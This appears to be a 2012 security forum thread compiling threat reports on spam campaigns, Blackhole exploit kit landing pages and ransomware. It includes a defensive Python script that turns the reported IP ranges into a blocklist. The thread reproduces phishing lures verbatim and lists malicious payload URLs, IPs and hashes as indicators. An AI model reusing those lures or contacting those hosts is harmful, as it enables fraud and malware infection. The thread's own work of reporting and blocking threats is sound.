Of note, CyberBunker has a long history of spamming and tolerating criminals. Blocking the range 84.22.96.0/19 should afford your network some additional protection."
:mad: :mad: :mad:
AplusWebMaster
2012-10-03, 00:08
FYI... multiple entries:
Fake ecard - unsolicited secret admirers via Email
- http://community.websense.com/blogs/securitylabs/archive/2012/10/02/unsolicited-secret-admirers-via-email.aspx
02 Oct 2012 - "... an unsolicited email campaign in which love-struck or curious recipients may have their appetites whetted by the thought of a secret admirer... The messages, sent from various Yahoo .com accounts, suggest that the sender has "to let you know how [they] feel" and provide an enticing Facebook link to "View Your Ecard":
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Components.ImageFileViewer/CommunityServer.Blogs.Components.WeblogFiles.securitylabs/7776.emailbody.png_2D00_550x0.png
... a valid short Facebook URL is used which, in this case, -redirects- ... a basic JavaScript is delivered... The victim's browser is then directed to a fake ecard site hxxp ://readyourecard .com/viewmessage/?a=vip36
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Components.ImageFileViewer/CommunityServer.Blogs.Components.WeblogFiles.securitylabs/6303.ecard.png_2D00_550x0.png
... At this point, the aim of the campaign becomes clear: Every link on the fake ecard page redirects to an affiliate landing page on the Adult Dating website AdultFriendFinder .com and, with affiliate earnings of up to $1 per unique visitor, you can easily see how such a campaign could become very lucrative... This campaign appears to be financially driven, but it is conceivable that the same techniques could be used to direct victims to malicious sites..."
___
Fake Fax Email notifications ...
- http://www.gfi.com/blog/beware-fake-fax-email-notifications-in-circulation/
Oct 2, 2012 - "In the last few days we’ve seen this fake fax email doing the rounds, offering up a “2013 recruitment plan”:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/faxmalware1.jpg
... INCOMING FAX REPORT
*********************************************************
Date/Time: 09/28/2012 07:01:41 AM
Speed: 14400 bps
Connection time: 01:02
Pages: 2
Resolution: Normal
Remote ID: 0420950504
Line number: 2
DTMF/DID:
Description: 2013 Recruitment plan
Click here to view the file online ..."
... Clicking the link would take the user from a (dot)de domain to an IP associated with a Malware run currently taking place... currently leads to a "page not found":
> http://www.gfi.com/blog/wp-content/uploads/2012/10/faxnotfound.jpg
... varied subject lines in this particular spam campaign – everything from recruitment plans to employment contributions and transaction reports – indicate a definite lean towards business targets rather than home users. Of course, whether at home or in the workplace you’re still potentially at risk should you click any of the links going out in this spamrun..."
:mad:
AplusWebMaster
2012-10-03, 14:36
FYI...
Fake Quickbooks emails lead to malware
- http://www.gfi.com/blog/fake-quickbooks-emails-lead-to-malware-shenanigans/?
Oct 3, 2012 - "We have some more rogue emails following the familiar pattern of the last few days – this time around, a fake Quickbooks themed email which promises “free shipping for Quickbooks customers”:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/quickbooksspam.jpg
It points to a website that shows the end-user a “connecting to server” message, eventually redirecting to an IP address that has been / is still associated with Blackhole Exploit Kit and Java exploits.
> http://www.gfi.com/blog/wp-content/uploads/2012/10/quickbooksspam2.jpg
... it’s a bad time to be randomly opening dubious emails..."
Fake QB/IRS order forms emails
- http://security.intuit.com/alert.php?a=62
10/03/2012
> http://security.intuit.com/images/phish63.jpg
___
Something evil on 66.45.251.224/29 and 199.71.233.226
- http://blog.dynamoo.com/2012/10/something-evil-on-664525122429-and.html
3 Oct 2012 - "The IP address 199.71.233.226 (Netrouting, US) and the range 66.45.251.224/29 (Interserver, US) are currently being used to distribute malware through advertising. Of these the 66.45.251.224/29 has been suballocated to an anonymous person, which I didn't even know was permitted... The domains listed below are on those IP addresses, all appear to be distributing malware (see example*) and they seem to have fake or anonymous WHOIS details. Blocking traffic to 66.45.251.224/29 (66.45.251.224 - 66.45.251.231) and 199.71.233.226 should be effective in countering this threat..."
Update: 95.211.193.36 (Leaseweb, Netherlands) and 77.95.230.77 (Snel Internet Services, Netherlands) may also be distributing malware in connection with this (report here**).
(More info at the blog.dynamoo URL above.)
* http://www.google.com/safebrowsing/diagnostic?site=juniorppv.info
"Site is listed as suspicious... Malicious software includes 8 trojan(s)..."
** http://wepawet.iseclab.org/view.php?hash=d5821ee7ba6fd7c95f6bf07137aee3b9&t=1349259972&type=js
___
Friendster SPAM / sonatanamore .ru
- http://blog.dynamoo.com/2012/10/friendster-spam-sonatanamoreru.html
2 Oct 2012 - "Friendster.. remember that? Before Facebook.. before Myspace.. there was Friendster. This spam email is -not- from Friendster though and leads to malware on sonatanamore .ru:
Date: Tue, 2 Oct 2012 05:39:54 -0500
From: Friendster Games [friendstergames@friendster.com]
Thank you for joining Friendster! Your system generated password is 0JR8YXB1YR. You may change your password in your Account Settings Page.
Friendster is the social gaming destination of choice. Connect and play with your friends & share your progress with your network.
Copyright © 2002 - 2012 Friendster, Inc. All rights reserved. Visit our site. - Terms of Service
To manage your notification preferences, go here
To stop receiving emails from us, you can unsubscribe here
The malicious payload is at [donotclick]sonatanamore .ru:8080/forum/links/column.php hosted on:
70.38.31.71 (iWeb, Canada)
202.3.245.13 (MANA, Tahiti)
203.80.16.81 (Myren, Malaysia)
Plain list of IPs and domains on those IPs for copy-and-pasting.
70.38.31.71, 202.3.245.13, 203.80.16.81 ..."
(More listed at the blog.dynamoo URL above.)
AplusWebMaster
2012-10-05, 01:43
FYI...
Fake "Corporate eFax message" SPAM / 184.164.136.147
- http://blog.dynamoo.com/2012/10/corporate-efax-message-spam-184164136147.html
4 Oct 2012 - "These fake fax messages lead to malware on 184.164.136.147:
Date: Thu, 04 Oct 2012 19:00:16 +0200
From: "eFax.Alert" [E988D6C @vida .org.pt]
Subject: Corporate eFax message - 09 pages
Fax Message [Caller-ID: 341-498-5688]
You have received a 09 pages fax at Thu, 04 Oct 2012 19:00:16 +0200.
* The reference number for this fax is min1_20121004190016.8673161.
View this fax using your PDF reader.
Click here to view this message
Please visit www .eFax .com/en/efax/twa/page/help if you have any questions regarding this message or your service.
Thank you for using the eFax service!
Home | Contact | Login
© 2011 j2 Global Communications, Inc. All rights reserved.
eFax® is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax® Customer Agreement.
... The malicious payload is at [donotclick]184.164.136.147/links/assure_numb_engineers.php which is an IP address belonging to Secured Servers LLC in the US and suballocated to:
autharea=184.164.128.0/19
xautharea=184.164.128.0/19
network:City:Manilla ...
It might be worth blocking 184.164.136.128/27 to be on the safe side."
- http://www.google.com/safebrowsing/diagnostic?site=AS:20454
"... over the past 90 days, 244 site(s)... served content that resulted in malicious software being downloaded and installed without user consent... the last time suspicious content was found was on 2012-10-04..."
- http://www.google.com/safebrowsing/diagnostic?site=AS:32164
"... the last time suspicious content was found was on 2012-10-03... we found 1 site(s) on this network... that appeared to function as intermediaries for the infection of 14 other site(s)..."
___
Verizon Wireless SPAM / strangernaturallanguage .net
- http://blog.dynamoo.com/2012/10/verizon-wireless-spam.html
4 Oct 2012 - "This fake Verizon wireless spam leads to malware on strangernaturallanguage .net:
From: AccountNotify whitheringj @spcollege .edu
Date: 4 October 2012 18:52
Subject: Recent Notification in My Verizon
SIGNIFICANT ACCOUNT NOTIFICATION FROM VERIZON WIRELESS.
Your informational letter is available.
Your account # ending: XXX8 XXXX4
Our Valued Client
For your accommodation, your confirmation message can be found in the Account Documentation desk of My Verizon.
Please check your acknowledgment letter for all the information relating to your new transaction.
View Approval Message
In addition, in My Verizon you will find links to info about your device & services that may be helpfull if you looking for answers.
Thank you for joining us .
My Verizon is also accessible 24 hours 7 days a week to assist you with:
Usage details
Updating your tariff
Add Account Users
Pay your invoice
And much, much more...
© 2012 Verizon Wireless
Verizon Wireless | One Verizon Way | Mail Code: 523WSE | Basking Ridge, MA 55584
We respect your privacy. Please review our privacy policy for more details
The malicious payload is at [donotclick]strangernaturallanguage .net/detects/notification-status_login.php hosted on 183.81.133.121 (Vodafone, Fiji)..."
AplusWebMaster
2012-10-05, 21:25
FYI...
Intuit "GoPayment" SPAM / simplerkwiks .net
- http://blog.dynamoo.com/2012/10/intuit-gopayment-spam-simplerkwiksnet.html
5 Oct 2012 - "This fake "Intuit GoPayment" spam leads to malware on simplerkwiks .net:
Date: Fri, 5 Oct 2012 15:54:26 +0100
From: "Intuit GoPayment" [abstractestknos65@pacunion.com]
Subject: Welcome - you're been granted access for Intuit GoPayment Merchant
Greetings & Congrats!
Your GoPayment? statement for WALLET , DEVELOPMENTS has been issued.
Intuit Payment
Account No.: XXXXXXXXXXXXXX16
Email Address: [redacted]
NOTE : Additional charges for this service may now apply.
Next step: Confirm your User ID
This is Very Important lets you:
Manage your payment service in the Merchant Center
Review charges
Log In to other Intuit products you may use, like TurboTax, Quicken, and Intuit Payroll
The good news is you have active an existing Intuit account for your email address, You can use this ID for your payment service also, or enter a new one.
Verify UserID
Get started:
Step 1: If you have not still, download the Intuit application.
Step 2: Run the GoPayment app and sign in with the UserID (your email address) and Password you setup.
Easy Manage Your GoPayment System
The Intuit GoPayment Merchant Service Center is the website where you can learn a lot about GoPayment features, customize your sales receipt and add GoPayment users. You can also manage transactions, deposits and fees. Visit link and signin with your GoPayment Access ID (your email address) and Password.
For more information on how to get started using Intuit Merchant, including tutorials, FAQs and other resources, visit the Service Center at web site.
Please do not reply to this message. automative notification system not configured to accept incoming email.
System Terms & Agreements © 2012 Intuit, Inc. All rights reserved.
The malicious payload is at [donotclick]simplerkwiks .net/detects/congrats_verify-access.php hosted on 183.81.133.121 (Vodafone, Fiji) along with these other suspect domains:
addsmozy .net
officerscouldexecute .org
simplerkwiks .net
strangernaturallanguage .net
buzziskin .net
art-london .net "
___
UPS SPAM / minus.preciseenginewarehouse .com
- http://blog.dynamoo.com/2012/10/ups-spam-minuspreciseenginewarehousecom.html
5 Oct 2012 - "This fake UPS spam leads to malware on minus.preciseenginewarehouse .com:
From: "UPSBillingCenter" [512A03797@songburi.com]
Subject: Your UPS Invoice is Ready
This is an automatically generated email. Please do not reply to this email address.
Dear UPS Customer,
New invoice(s) are available for the consolidated payment plan(s) / account(s) enrolled in the UPS Billing Center
Please visit the UPS Billing Center to view and pay your invoice.
Discover more about UPS:
Visit ups .com
Explore UPS Freight Services
Learn About UPS Companies
Sign Up For Additional Email From UPS
Read Compass Online
(c) 2012 United Parcel Service of America, Inc. UPS, the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
For more information on UPS's privacy practices, refer to the UPS Privacy Policy.
Please do not reply directly to this e-mail. UPS will not receive any reply message.
For questions or comments, visit Contact UPS.
This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
Privacy Policy
Contact UPS
The malicious payload is at [donotclick]minus.preciseenginewarehouse .com/links/assure_numb_engineers.php hosted on 174.140.165.112 ... To be precise, the subdomains seem malicious, the domains themselves appear to be legitimate ones where the domain account has been hacked. Blocking 174.140.165.112 would be prudent."
AplusWebMaster
2012-10-08, 05:50
FYI...
Something evil on 5.9.188.54
- http://blog.dynamoo.com/2012/10/something-evil-on-5918854.html
7 Oct 2012 - "Here's a nasty bunch of sites being used in injection attacks, all hosted on 5.9.188.54:
nfexfkloawuqlaahsyqrxo.qlvyeviexqzrukyo.waw .pl
nqvzrpyoossmr.qlvyeviexqzrukyo.waw .pl
xfynhovgofzsqueuuprplvv.qlvyeviexqzrukyo.waw .pl
lgrfuqfwz.qlvyeviexqzrukyo.waw .pl
zlqfrypzqyubsedrzugeaf.urblvhnfxzrozzlz.waw .pl
qxggipnnfmnihkic .ru
mvuvchtcxxibeubd .ru
5.9.188.54 is a Hetzner IP address (no surprise there) suballocated to:
inetnum: 5.9.188.32 - 5.9.188.63
netname: LLC-CYBERTECH
descr: LLC "CyberTech"
country: DE ...
address: 125252 Moscow
address: RUSSIAN FEDERATION
... You might want to block the whole 5.9.188.32/27 range.. you should certainly block 5.9.188.54 if you can."
- http://centralops.net/co/DomainDossier.aspx
5.9.188.54
address: 125252 Moscow
address: RUSSIAN FEDERATION...
origin: AS24940
- http://google.com/safebrowsing/diagnostic?site=AS:24940
"... over the past 90 days, 5865 site(s)... served content that resulted in malicious software being downloaded and installed without user consent... last time suspicious content was found was on 2012-10-07... we found 998 site(s)... that appeared to function as intermediaries for the infection of 12809 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 1752 site(s)... that infected 18780 other site(s)."
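The blocking advice in the posts above (66.45.251.224/29 spelled out as 66.45.251.224 - 66.45.251.231, 184.164.136.128/27 "to be on the safe side", the 5.9.188.32/27 sub-allocation and the single hosts 199.71.233.226, 183.81.133.121 and 174.140.165.112) turned into a blocklist and run over proxy log lines. This is an added example for this thread, not code from dynamoo.com or any of the blogs quoted; the indicators are the ones stated in the posts, the log lines are constructed for the demo, and the URLs in them are defanged.

```python
"""Turn the blocking advice quoted in this thread (66.45.251.224/29,
184.164.136.128/27, 5.9.188.32/27 and a few single IPs) into a blocklist
and run it over proxy log lines.

Added example for this thread, not code from dynamoo.com or any other
blog quoted above. The indicators are the ones stated in the posts; the
log lines are constructed for the demo and the URLs in them are defanged.
"""
import ipaddress
import re
from typing import Dict, Iterable, List, Tuple

# Indicators as stated in the quoted posts: ranges and single hosts mixed.
INDICATORS = [
    "66.45.251.224/29",     # Interserver range, malvertising
    "199.71.233.226",       # Netrouting, same campaign
    "184.164.136.128/27",   # eFax spam landing page, "to be on the safe side"
    "5.9.188.32/27",        # Hetzner sub-allocation used in injection attacks
    "183.81.133.121",       # Vodafone Fiji host behind several spam runs
    "174.140.165.112",      # UPS spam landing page
]


def build_blocklist(indicators: Iterable[str]) -> List[ipaddress.IPv4Network]:
    """Normalise everything to a network so single IPs (/32) and CIDR
    ranges are matched the same way."""
    return [ipaddress.ip_network(i, strict=False) for i in indicators]


def cidr_bounds(cidr: str) -> Tuple[str, str]:
    """First and last address of a range, the form the posts spell out,
    e.g. 66.45.251.224/29 is 66.45.251.224 - 66.45.251.231."""
    net = ipaddress.ip_network(cidr, strict=False)
    return str(net.network_address), str(net.broadcast_address)


def is_blocked(ip: str, blocklist) -> bool:
    """True when the address falls inside any listed network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in blocklist)


# Constructed log lines: "<epoch> <client> <destination ip> <url>".
SAMPLE_LOG = """\
1349258000.123 10.0.0.5 66.45.251.227 hxxp://ad-host.example/ad.php
1349258001.456 10.0.0.7 93.184.216.34 hxxp://example.com/
1349258002.789 10.0.0.9 5.9.188.54 hxxp://qxggipnnfmnihkic[.]ru/
1349258003.000 10.0.0.5 66.45.251.232 hxxp://neighbour.example/
1349258004.321 10.0.0.11 183.81.133.121 hxxp://simplerkwiks[.]net/detects/congrats_verify-access.php
"""
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<dest>\S+)\s+(?P<url>\S+)$")


def find_hits(log_text: str, blocklist) -> List[Dict[str, str]]:
    """One record per log line whose destination falls inside the blocklist."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_blocked(m["dest"], blocklist):
            hits.append({"client": m["client"], "dest": m["dest"], "url": m["url"]})
    return hits


if __name__ == "__main__":
    bl = build_blocklist(INDICATORS)
    for h in find_hits(SAMPLE_LOG, bl):
        print(f"{h['client']} -> {h['dest']} {h['url']}")
```

Note that 66.45.251.232 sits one address past the /29 and is correctly left alone, while 5.9.188.54 is caught by the /27 rather than by a per-host entry; that is the difference between blocking the single IP a post names and blocking the range it recommends.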
AplusWebMaster
2012-10-08, 14:11
FYI...
Skype users targeted with Ransomware and Click Fraud
- http://www.gfi.com/blog/skype-users-targeted-with-ransomware-and-click-fraud/
Oct 8, 2012 - "The infection* that’s still spreading across users of Skype has taken an interesting twist: ransomware and click fraud. Skype users tempted to follow the latest set of infection links will end up with a zipfile on their PC. Here’s an example of the rogue links still being pinged around:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/skypevirus41.jpg
Clicking the link will download a zipfile, and running the executable inside will see the infected PC making waves with network traffic that wasn’t present when we tested the last executable...
> http://www.gfi.com/blog/wp-content/uploads/2012/10/RansomWare_EncryptionScare4-300x152.jpg
After a while, a Java exploit will call down some fire from the sky (in the form of BlackHole 2.0) and the end-user will be horrified to see this:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/RansomWare_EncryptionScare1.jpg
... a typical Ransomware scare message that locks the user out of their data, encrypts the files and demands payment (via Moneypak) to the tune of $200. The IP address and geographical location is displayed in the bottom right hand corner, along with various threats related to the downloading of MP3s, illegal pornography, gambling and more besides. Ransomware is currently a big deal and not something an end-user really wants to have on their computer. Meanwhile, behind the scenes we have what looks like attempts at click fraud taking place behind the locked computer screen... in the space of 10 minutes, we recorded 2,259 transmissions(!)... to infect the computer, you’ll need to manually click the download link, open the zip and run the executable. On top of that, anybody trying to open the file who hasn’t switched off file security warnings will be told that “The publisher could not be verified, are you sure you want to run this software” so there’s plenty of chances to dodge this bullet..."
* http://www.gfi.com/blog/infection-spreads-profile-pic-messages-to-skype-users/
AplusWebMaster
2012-10-10, 15:08
FYI...
Skype SPAM voicemail leads to Blackhole / Zeus attacks
- http://www.gfi.com/blog/skype-voicemail-spam-leads-to-blackhole-zeus-attacks/
Oct 10, 2012 - "... spam mail... claims to be a Skype Voicemail notification, for example:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/skypevoicemailscam.png
It reads as follows:
Hi there,
You have a new voicemail
Sign in to Skype to listen to the message.
If you no longer want to receive email alerts about new voicemails, unsubscribe now.
Talk soon,
The people at Skype
It looks pretty authentic, and will send curious clickers to URLs tied up in Blackhole / Zeus infections. On a related note, we’re also seeing Sprint Wireless and fake Facebook friend request spam doing much the same as the above so please be careful when wading through your inbox – there’s a fair amount of spam targeting users with exploits right now and it covers a wide range of subjects from payroll notifications and Craigslist adverts to UPS invoices and American Express payment receipts."
- http://pandalabs.pandasecurity.com/is-it-your-new-pic-profile-no-it-s-a-worm-spreading-through-skype-and-messenger/
10/10/12
___
Skype Messages Spreading DORKBOT Variants
- http://blog.trendmicro.com/trendlabs-security-intelligence/skype-messages-spreading-dorkbot-variants/
Oct 9, 2012
- http://blog.trendmicro.com/trendlabs-security-intelligence/the-dorkbot-rises/
Oct 16, 2012 - "... spreading via Skype spammed messages... now reached (more than) 17,500 reported infections globally... DORKBOT is not primarily meant to steal information, but still has the capability to steal login credentials. It does this by hooking several APIs in popular web browsers. Among the sites monitored are Twitter, Facebook, Bebo, Friendster, Paypal, Netflix, and Sendspace. DORKBOT also checks strings sent to monitored sites via HTTP POST, thus information in HTTP form files like passwords, usernames, and email addresses... DORKBOT downloads an updated copy of itself per day, which are typically undetected because they arrive with different packers. This is probably done to remain undetected on the infected system. With multiple dangerous routines and propagation methods well-fit into the common users’ typical online activities, DORKBOT is clearly a threat that users need to avoid and protect themselves from..."
- http://blog.spiderlabs.com/2012/10/worm-propagates-through-skype-messages.html
12 Oct 2012
___
Rampaging Squirrel + Boyband = Twitter SPAM
- http://www.gfi.com/blog/rampaging-squirrel-boyband-twitter-spam/
Oct 10, 2012 - "Yesterday I saw a news article that did a frankly amazing job of rendering the plight of a boyband member being attacked by a squirrel*, and mentioned it on Twitter. Within seconds, I was on the receiving end of some spam telling me I’d won a prize:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/1dirspam.jpg
Twitter users were spammed in groups, with the above account holding off on providing a URL to click. Instead, curious Tweeters would instead choose to visit the above account then click the URL in the profile – onedgiveaway(dot)com.
> http://www.gfi.com/blog/wp-content/uploads/2012/10/2dirspam.jpg
“Congratulations 1D Fan! Please vote for your favourite 1D member below. To say thanks accept a free gift worth over $500
... I went for Liam Payne on the basis that he might be related to Max and ended up with the following survey page located at 1dviptickets(dot)com:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/3dirspam.jpg
... I came away with no free gift but lots of surveys (and a whole bunch of “Are you sure you want to go” style pop-ups while trying to leave the page) – nobody has “won” anything, it’s just some random fire-and-forget spam. At time of writing, the spam account is still active and blindfiring more messages to random Twitter users..."
* http://www.wandsworthguardian.co.uk/news/9972709.One_Direction_star_viciously_attacked_by_Battersea_Park_squirrel/
___
Fake job offers - union-trans .com employment scam
- http://blog.dynamoo.com/2012/10/union-transcom-employment-scam.html
10 Oct 2012 - "This fake job offer is for a "forwarding agent"... basically it's a parcel reshipping scam where goods bought with stolen credit cards are sent to the "agent's" home address, and then the "agent" forwards the stolen goods on to Eastern Europe or China or whatever. Of course, when the police catch on it's the "agent" who is in deep, deep trouble... There appear to be several scam domains in this same email. union-trans .com is hosted on 180.178.32.238 (Simcentric, Hong Kong)... Originating IP is 183.134.113.165 (Zhejiang Telecom, Ningbo, China)... Generally speaking, unsolicited job offers from out-of-the-way places are bad news and should be avoided."
Sprint SPAM / 1.starkresidential .net
- http://blog.dynamoo.com/2012/10/sprint-spam-1starkresidentialnet.html
9 Oct 2012 - "This fake Sprint spam leads to malware on 1.starkresidential .net...
The malicious payload is at [donotclick]1.starkresidential .net/links/assure_numb_engineers.php hosted on 74.207.233.58 (Linode, US)... appear to be malicious subdomains of legitimate hacked domains. If you can, you should block traffic to 74.207.233.58 to stop other malicious sites on the same server from being a problem."
"Biweekly payroll" SPAM / editdvsyourself .net
- http://blog.dynamoo.com/2012/10/biweekly-payroll-spam-editdvsyourselfnet.html
9 Oct 2012 - "This fake payroll spam leads to malware on editdvsyourself .net...
The malicious payload is on [donotclick]editdvsyourself .net/detects/beeweek_status-check.php, hosted on the familiar IP address of 183.81.133.121 (Vodafone, Fiji)..."
___
Facebook Scam SPAM
- https://isc.sans.edu/diary.html?storyid=14281
Last Updated: 2012-10-10 14:32:26 UTC - "... reports of Facebook Scam Spam... TinyURL has since taken down the redirect and classified it as Spam. However, the image (and others like it) still propagate by FB users clicking on the link. This type of scam is used mostly -without- the permission of the vendor noted, in this case Costco*. The idea is to entice the user to click so they get -redirected- to a site where the business model depends on traffic volume...
> https://isc.sans.edu/diaryimages/Diary14281-Costco-Scam-Spam.png
If you are a Facebook user, then please be wary of any offers that entice you to "click" to receive. It's a really bad practice. The holiday shopping season is beginning and these vectors are going to be heavily used by the scammers in the coming months."
AplusWebMaster
2012-10-10, 21:00
FYI...
Malicious Presidential SPAM campaign has started...
- http://community.websense.com/blogs/securitylabs/archive/2012/10/10/breaking-news-the-malicious-usa-presidential-spam-campaign-started.aspx
10 Oct 2012 - "... Websense... has detected a spam campaign that tries to exploit recipients' interest in the current presidential campaign in the US. Specifically, we have detected thousands of emails with this kind of content:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Components.ImageFileViewer/CommunityServer.Blogs.Components.WeblogFiles.securitylabs/6371.ssshot001.png_2D00_550x0.png
... we are seeing an increasing number of spam campaigns with malicious links that lead to BlackHole exploit pages. This is also what happens with this campaign. If the recipient clicks on one of the links in the email, it starts a redirection flow which leads to URLs that host BlackHole exploit code. We simulated the recipient's experience with the support of the Fiddler tool, as shown below:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/4530.sshot002.png
The pattern used strongly resembles the pattern used in other malicious, BlackHole-based spam campaigns, so we decided to investigate using a little set of samples from this campaign. The samples were chosen based on thousands of emails.
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/1106.sshot004.PNG
The links found in the spam emails usually have this kind of content:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/2438.sshot005.PNG
The purpose of this flow as usual is to install malicious files. In this malicious SPAM campaign, we noticed low detected PDF, JAR and EXE files (used to compromise the victim systems). During our simulated user experience we have found the following involved files:
PDF - MD5: 69e51d3794250e3f1478404a72c7a309
JAR file - MD5: 03373056bb050c65c41196d3f2d68077
about.exe - MD5: 9223b428b28c7b8033edbb588968eaea ...
Each URL... contains a redirection payload that leads the victim to a malicious website that hosts BlackHole exploit kit 2.0 obfuscated code..."
- http://blog.trendmicro.com/trendlabs-security-intelligence/obama-vs-romney-political-online-threats/
Update as of Oct 11, 2012 - "... email is supposedly from CNN and contains news stories about the election:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2012/10/cnn-spam.png
... instead of news articles, the links lead users to a variant of the ZeuS banking Trojan, delivered by the Blackhole exploit kit..."
- http://blog.trendmicro.com/trendlabs-security-intelligence/obama-vs-romney-political-online-threats/
Oct 10, 2012 - "... This reinforces the fact that the bad guys have all the bases covered when it comes to exploiting popular events. Whoever wins come November 6th, end users will end up losing in one way or another if they’re not careful. So keep yourself informed. Get your news only from trusted sources, and make sure to have an Internet security solution installed on your devices."
AplusWebMaster
2012-10-11, 23:01
FYI... Multiple entries:
LinkedIn SPAM / inklingads .biz
- http://blog.dynamoo.com/2012/10/linkedin-spam-inklingadsbiz.html
11 Oct 2012 - "The bad guys are very busy today with all sorts of spam campaigns, including lots of messages as below pointing to malware on
From: LinkedIn Notification [mailto:hewedngq6@omahahen.org]
Sent: 11 October 2012 15:59
Subject: LinkedIn Reminder
Importance: High
LinkedIn
REMINDERS
Invite events:
From Thaddeus Sosa ( Your servant)
PENDING EVENTS
There are a total of 3 messages awaiting your action. See your InBox immediately...
The malicious payload is on [donotclick]inklingads.biz/detects/invite-request_checking.php hosted on 183.81.133.121 (Vodafone, Fiji)"
___
ADP SPAM / 198.143.159.108
- http://blog.dynamoo.com/2012/10/adp-spam-198143159108.html
12 Oct 2012 - "Yet -more- fake ADP spam (there has been a lot over the past 24 hours) is being pushed out. This time there's a malicious payload at [donotclick]198.143.159.108 /links/rules_familiar-occurred.php (Singlehop, US).
Avoid."
___
ADP SPAM / 4.wapin .in and 173.224.209.165:
- http://blog.dynamoo.com/2012/10/adp-spam-4wapinin.html
11 Oct 2012 - "This fake ADP spam leads to malware on 4.wapin .in:
From: ADP.Security [mailto:5BC4F06B@act4kids.net]
Sent: 11 October 2012 14:22
Subject: ADP: Urgent Notification
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY.
If you have any questions, please contact your administrator for assistance.
----
Digital Certificate About to Expire...
The malicious payload is on [donotclick]4.wapin .in/links/assure_numb_engineers.php hosted on 198.136.53.39 (Comforthost, US).
Another variant of this goes to [donotclick]173.224.209.165/links/assure_numb_engineers.php (Psychz Networks, US)"
___
ADP SPAM / 108.61.57.66
- http://blog.dynamoo.com/2012/10/adp-spam-108615766.html
11 Oct 2012 - "There's masses of ADP-themed spam today. Here is another one:
Date: Thu, 11 Oct 2012 14:53:17 -0200
From: "ADP.Message" [986E3877@dixys.com]
Subject: ADP Generated Message
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY.
If you have any questions, please contact your administrator for assistance.
---------------------------------------------------------------------
Digital Certificate About to Expire
---------------------------------------------------------------------
The digital certificate you use to access ADP's Internet services is about to expire. If you do not renew your certificate by the expiration date below, you will not be able to access ADP's Internet services.
Days left before expiration: 3
Expiration date: Oct 14 23:59:59 GMT-03:59 2012
---------------------------------------------------------------------
Renewing Your Digital Certificate ...
In this case the malicious payload is at [donotclick]108.61.57.66 /links/assure_numb_ engineers .php hosted by Choopa LLC in the US. The IP is probably worth blocking to be on the safe side."
___
Blackhole sites to block ...
- http://blog.dynamoo.com/2012/10/blackhole-sites-to-block-111012.html
11 Oct 2012 - "A bunch of sites are active today with the Blackhole exploit kit.. here are the ones seen so far:
183.81.133.121
198.136.53.39
173.255.223.77
64.247.188.141
inklingads .biz
The delivery mechanisms are fake LinkedIn and eFax messages. Block those IPs if you can."
___
"Copies of Policies" SPAM / windowsmobilever .ru
- http://blog.dynamoo.com/2012/10/copies-of-policies-spam.html
11 Oct 2012 - "This slightly odd spam leads to malware on windowsmobilever .ru:
Date: Thu, 11 Oct 2012 10:55:37 -0500
From: "Amazon.com" [account-update@amazon.com]
Subject: RE: DONNIE - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
DONNIE LOCKWOOD,
==========
Date: Thu, 11 Oct 2012 12:26:25 -0300
From: accounting@[redacted]
Subject: RE: MARGURITE - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
MARGURITE Moss
Anyone who clicks on the link will end up on an exploit kit at [donotclick]windowsmobilever .ru:8080/forum/links/column.php - hosted on:
68.67.42.41 (Fibrenoire , Canada)
203.80.16.81 (MYREN, Malaysia)
These two IPs are currently involved in several malicious spam runs and should be blocked if you can."
___
eFax SPAM / 173.255.223.77 and chase .swf
- http://blog.dynamoo.com/2012/10/efax-spam-17325522377-and-chaseswf.html
11 Oct 2012 - "Two different eFax spam runs seem to be going on at the same time:
' From: eFax Corporate [mailto:05EBD8C@poshportraits.com]
Sent: 11 October 2012 12:58
Subject: eFax notification
You have received a 50 page(-s) fax...'
' From: eFax.Corporate [mailto:2C4C2348@aieservices.com.au]
Sent: 11 October 2012 12:51
Subject: eFax: You have received new fax
You have received a 34 page(-s) fax...'
One leads to a malicious landing page at [donotclick]173.255.223.77 /links/assure_numb_engineers.php hosted by Linode in the US.
The other one is a bit odder, referring to a file called chase.swf on a hacked site. VT analysis shows just 1/44* which is -not- good..."
* https://www.virustotal.com/file/5db60c98687a6355c178ebb744beceacc2c49b8f666ac62ff338154402597784/analysis/
File name: chase.swf-QrUTmm
Detection ratio: 1/40
Analysis date: 2012-10-11 13:04:39 UTC...
AplusWebMaster
2012-10-15, 14:03
FYI...
Vodafone SPAM - emails serve malware
- http://blog.webroot.com/2012/10/15/vodafone-europe-your-account-balance-themed-emails-serve-malware/
Oct 15, 2012 - "Cybercriminals are currently spamvertising millions of emails, impersonating Vodafone Europe, in an attempt to trick their customers into executing the malicious file attachment found in the email...
Sample screenshot of the spamvertised email:
